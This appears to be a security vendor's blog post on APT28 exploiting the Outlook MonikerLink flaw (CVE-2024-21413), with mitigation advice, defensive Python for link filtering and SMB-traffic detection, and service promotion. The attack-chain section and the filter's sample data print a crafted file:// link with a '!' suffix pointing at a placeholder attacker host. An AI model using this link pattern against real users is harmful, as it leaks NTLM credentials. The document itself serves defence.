UAC-0028 Activity and CERT-UA Analysis: Exploit of CVE-2024-21413 (CVSS 9.8)


Key Takeaways:

  • The threat actor group UAC-0028 (APT28/Fancy Bear) is actively exploiting CVE-2024-21413 to target government and military infrastructure.
  • The vulnerability, known as “MonikerLink,” allows for the unauthorized transmission of NTLM hashes by bypassing Outlook security controls.
  • Attackers utilize leaked credentials for lateral movement, NTLM relay attacks, and data exfiltration.
  • Effective defense requires a combination of urgent patching, blocking outbound SMB traffic, and integrated threat intelligence monitoring.


Technical Analysis of CERT-UA Findings and CVE-2024-21413

The Computer Emergency Response Team of Ukraine (CERT-UA) recently identified a series of targeted cyberattacks attributed to the threat actor group UAC-0028, also known as APT28 or Fancy Bear. These operations focus on the exploitation of critical vulnerabilities within Microsoft Outlook, specifically CVE-2024-21413 (CVSS 9.8), to gain unauthorized access to government and military infrastructure. This technical analysis explores the tactics, techniques, and procedures (TTPs) documented by CERT-UA and provides data necessary for engineering teams to implement defensive measures.

The primary mechanism for initial access documented by CERT-UA involves the delivery of malicious emails containing links that leverage the MonikerLink vulnerability. This vulnerability exists in the way Microsoft Outlook handles specific URI schemes, particularly when an email contains a link using the file:// protocol followed by an exclamation point and a sequence of characters.

When a user clicks on a specially crafted link, Outlook fails to properly validate the “Moniker” string. This failure allows the attacker to bypass the Office Protected View and the Security Component that typically warns users about potentially unsafe links. The result is the automatic transmission of the user’s New Technology LAN Manager (NTLM) hashes to an external, attacker-controlled Server Message Block (SMB) share. In some configurations, this can lead to remote code execution (RCE) if the attacker can influence the underlying COM (Component Object Model) objects used by the application.

CERT-UA reports that UAC-0028 uses these leaked NTLM hashes for NTLM relay attacks or offline cracking. Once credentials are compromised, the group moves laterally within the victim’s network to extract sensitive information. Detecting this activity is often aided by a cyber threat intelligence platform that monitors for known malicious infrastructure associated with UAC-0028, enabling faster identification of outbound SMB traffic to unauthorized IP addresses.

Attack Vector and Execution Flow

The attack chain observed by CERT-UA follows a standardized progression:

  • Phishing Delivery: The actor sends an email that appears to be a legitimate communication related to administrative or military matters.
  • URI Manipulation: The email body contains a hyperlink formatted to trigger CVE-2024-21413. For example: <a href="file:///\\ATTACKER_IP\SHARE\FILE.txt!something">Click Here</a>.
  • Bypass of Security Controls: By appending the ! character, the attacker forces the Outlook client to bypass the standard security prompts.
  • Credential Leakage: The client attempts to authenticate with the remote SMB server, sending the local user’s NTLM hash.
  • Post-Exploitation: The attacker uses the captured hash to authenticate to other services or utilizes the initial access to deploy secondary malware payloads.

[Image: Threat actor exploiting Microsoft Outlook vulnerability]

Data from CERT-UA indicates that this vulnerability is frequently paired with other exploits to ensure persistence. Organizations without breach detection capabilities often overlook these initial NTLM leaks, as they may appear as standard network traffic if outbound SMB is not strictly restricted.

Role of Dark Web and Messaging Monitoring

UAC-0028 and similar state-sponsored actors do not operate in a vacuum. CERT-UA has noted that the infrastructure used in these campaigns is often discussed or traded within illicit environments. Utilizing a dark web monitoring service allows defenders to identify if internal credentials or domains are being targeted by specific exploit kits.

Furthermore, Telegram threat monitoring has become essential for tracking the movement of threat actors. UAC-0028 has been observed using Telegram as a command-and-control (C2) channel or for exfiltrating small data packets to avoid detection by traditional network security tools. Monitoring these channels provides real-time ransomware intelligence and broader threat data, even if the primary goal of the UAC-0028 campaign is espionage rather than immediate financial gain.

The coordination of such attacks often involves the acquisition of compromised infrastructure via underground forum intelligence. Actors buy access to legitimate but poorly secured servers to host their malicious MonikerLinks, making the source of the attack appear more credible and bypassing simple IP-based reputation filters.

Supply-Chain and Brand Risks

CERT-UA’s investigation emphasizes that the targets are not limited to direct government employees. The threat extends to the broader ecosystem of contractors and service providers. This necessitates a focus on supply-chain risk monitoring. If a third-party vendor is compromised via CVE-2024-21413, the attacker can use the vendor’s legitimate communication channels to target the primary organization.

In addition to technical vulnerabilities, brand leak alerting is required to identify spoofed domains that UAC-0028 uses to host phishing templates. These templates often mimic official government portals to increase the likelihood of a user clicking the malicious link. By correlating live ransomware API data with identified phishing infrastructure, security teams can proactively block domains before they are used in an active campaign.

Technical Mitigation and Security Controls

To mitigate the risks associated with CVE-2024-21413 and the TTPs of UAC-0028, engineers should implement the following technical controls:

Network Level Controls

  • Block Outbound SMB: Disable outbound traffic on TCP port 445. This prevents NTLM hashes from being transmitted to external servers.
  • DNS Filtering: Implement filtering to block access to known C2 domains identified by CERT-UA.
  • Inbound Email Filtering: Configure email gateways to strip or rewrite URLs that use the file:// protocol or contain unusual characters like ! within the URI.
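The gateway rule above, and the link format shown in the attack chain earlier, can be checked mechanically. The following is an added example, not code from CERT-UA or PurpleOps: it scans an HTML mail body for hyperlinks, classifies each target (file:// with the "!" moniker suffix, plain file:// UNC fetches, or a "!" in some other scheme), and neutralises the flagged ones. The sample body, the ATTACKER_IP placeholder and the 192.0.2.10 address are constructed for the example.

```python
import re
from html import unescape
from urllib.parse import unquote, urlsplit

# Constructed sample of an inbound HTML body (not CERT-UA data). ATTACKER_IP is
# the same placeholder the write-up uses; 192.0.2.10 is a documentation address.
SAMPLE_BODY = r"""<p>Please review the attached order.</p>
<a href="file:///\\ATTACKER_IP\SHARE\FILE.txt!something">Click Here</a>
<a href="https://portal.example.gov/login">Portal</a>
<a href="FILE://\\192.0.2.10\docs\memo.docx">Memo</a>
<a href="https://example.org/path!notes">Notes</a>
"""

HREF_RE = re.compile(r'href\s*=\s*"([^"]*)"', re.IGNORECASE)
BLOCKED = "#blocked-by-gateway"   # inert replacement target (assumed policy)

def classify_href(href: str) -> str:
    """Classify one hyperlink target as monikerlink, file-uri, bang-in-uri or allow."""
    # Normalise HTML entities and percent-encoding first so an encoded "!" or
    # backslash cannot slip past the string checks below.
    target = unquote(unescape(href)).strip()
    scheme = urlsplit(target).scheme.lower()
    if scheme == "file":
        # file:// plus "!" is the MonikerLink pattern; a plain file:// link still
        # makes the client fetch a UNC path (and send NTLM) so it is flagged too.
        return "monikerlink" if "!" in target else "file-uri"
    if "!" in target:
        return "bang-in-uri"   # unusual character in a non-file URI, per the rule
    return "allow"

def rewrite_body(body: str):
    """Neutralise every flagged href in the body; return (new_body, findings)."""
    findings = []

    def _sub(match):
        original = match.group(1)
        verdict = classify_href(original)
        findings.append((original, verdict))
        if verdict == "allow":
            return match.group(0)          # leave benign links untouched
        return f'href="{BLOCKED}" data-gateway-verdict="{verdict}"'

    return HREF_RE.sub(_sub, body), findings
```

Policy for the bang-in-uri class is left to the operator; the other two classes are the ones the page says to strip or rewrite.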

Endpoint and Application Controls

  • Patching: Prioritize the installation of Microsoft security updates that address CVE-2024-21413. This is the most effective way to close the vulnerability within Outlook.
  • Disable NTLM: Where possible, transition to more secure authentication protocols such as Kerberos.
  • Credential Guard: Enable Windows Defender Credential Guard to protect NTLM hashes from extraction.

Monitoring and Detection

  • Audit NTLM Usage: Enable “Audit NTLM” in Group Policy to identify reliance on this protocol.
  • Monitor Process Execution: Look for unusual child processes spawned by outlook.exe.
  • Log SMB Traffic: Analyze Event ID 5140 and Event ID 5145 for unexpected external connections.
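The outbound-SMB detection described here (and in the "Block Outbound SMB" control above) can be expressed as a small rule over flow or firewall records. This is an added example, not a PurpleOps or CERT-UA rule: it parses constructed flow lines, flags TCP/445 connections from internal hosts to addresses outside the organisation's own ranges, and groups hits per source so a single leaking workstation surfaces once. The internal ranges, the log format and all addresses are assumptions for the example.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records (not real telemetry): "timestamp src dst dport action".
SAMPLE_FLOWS = """\
2024-03-01T09:14:02Z 10.20.5.17 10.20.1.4 445 allow
2024-03-01T09:14:05Z 10.20.5.17 203.0.113.45 445 allow
2024-03-01T09:14:09Z 10.20.5.31 198.51.100.7 445 deny
2024-03-01T09:15:11Z 10.20.5.17 203.0.113.45 443 allow
2024-03-01T09:16:40Z 10.20.5.17 203.0.113.45 445 allow
"""

# Assumed organisation-internal ranges; an explicit list is used rather than
# ipaddress.is_private so that the classification matches local policy.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
SMB_PORTS = {445}   # TCP/445 is the port the write-up says to block outbound

def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def parse_flow(line: str) -> dict:
    ts, src, dst, dport, action = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "action": action}

def find_outbound_smb(flows_text: str) -> list:
    """Return flows on an SMB port from an internal host to an external address.
    Denied flows are kept: the client still tried to send NTLM credentials."""
    alerts = []
    for line in flows_text.splitlines():
        if not line.strip():
            continue
        f = parse_flow(line)
        if f["dport"] in SMB_PORTS and not is_external(f["src"]) and is_external(f["dst"]):
            alerts.append(f)
    return alerts

def summarise(alerts: list) -> dict:
    """Aggregate per internal source: attempt count, distinct targets, blocked count."""
    by_src = defaultdict(lambda: {"count": 0, "dsts": set(), "blocked": 0})
    for a in alerts:
        s = by_src[a["src"]]
        s["count"] += 1
        s["dsts"].add(a["dst"])
        s["blocked"] += int(a["action"] == "deny")
    return dict(by_src)
```

Denied attempts are the most useful signal: the perimeter block worked, but the workstation that made the attempt has likely rendered a malicious link and should be checked for outlook.exe activity.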

PurpleOps Expertise in Threat Mitigation

The complexities of tracking state-sponsored actors like UAC-0028 require a multi-layered approach to security. PurpleOps provides the infrastructure and expertise needed to manage these risks effectively. Through our cyber threat intelligence platform, we aggregate data from multiple sources, including CERT-UA, to provide actionable data to our clients.

Our Cyber Threat Intelligence services are designed to identify TTPs specific to groups like APT28. By integrating real-time ransomware intelligence and live ransomware API feeds, we ensure that our defensive models are current with the latest exploit trends.

To address the risks of credential theft and unauthorized access, PurpleOps offers a Dark Web Monitoring service. This service scans for leaked credentials and mentions of organizational assets in underground forums, providing brand leak alerting before an incident escalates. For organizations concerned about their external attack surface, our Penetration Testing and Red Team Operations teams simulate the exact methods used by actors like UAC-0028.

We also assist in managing the risks posed by third-party partners through Supply Chain Information Security. This ensures that supply-chain risk monitoring is integrated into the broader security strategy. For comprehensive protection, our Protect Ransomware and broader Services provide a structured framework for defense.

Summary of Actionable Steps

For Technical Teams

  1. Verify Patch Status: Ensure all instances of Microsoft Office are patched against CVE-2024-21413.
  2. Firewall Configuration: Confirm that outbound port 445 is blocked at the perimeter.
  3. GPO Updates: Implement Restricted Groups and restrict NTLM usage.
  4. SIEM Rules: Create alerts for outbound connection attempts on SMB ports to external IP addresses.

For Business Leaders

  1. Risk Assessment: Evaluate the organization’s exposure to state-sponsored espionage.
  2. Third-Party Review: Audit the security posture of critical vendors regarding CVE-2024-21413.
  3. Investment in Intelligence: Allocate resources toward monitoring coordination on Telegram and underground forums.

For more information on how to secure your infrastructure, explore the PurpleOps Platform or contact our team for a detailed consultation.

Frequently Asked Questions

What is the “MonikerLink” vulnerability?
It is a critical bug (CVE-2024-21413) in Microsoft Outlook that allows attackers to bypass security warnings and leak NTLM hashes by misusing URI schemes in links.

Who is UAC-0028?
UAC-0028 is a state-sponsored threat actor group also known as APT28 or Fancy Bear, primarily associated with cyber-espionage operations.

How can I detect if I have been targeted by this exploit?
Organizations should monitor network logs for unauthorized outbound traffic on TCP port 445 (SMB) and audit process execution for unusual activity originating from outlook.exe.

Is patching enough to stop UAC-0028?
While patching CVE-2024-21413 is essential, defense-in-depth measures like blocking SMB, disabling NTLM, and utilizing threat intelligence are necessary to counter advanced persistent threats.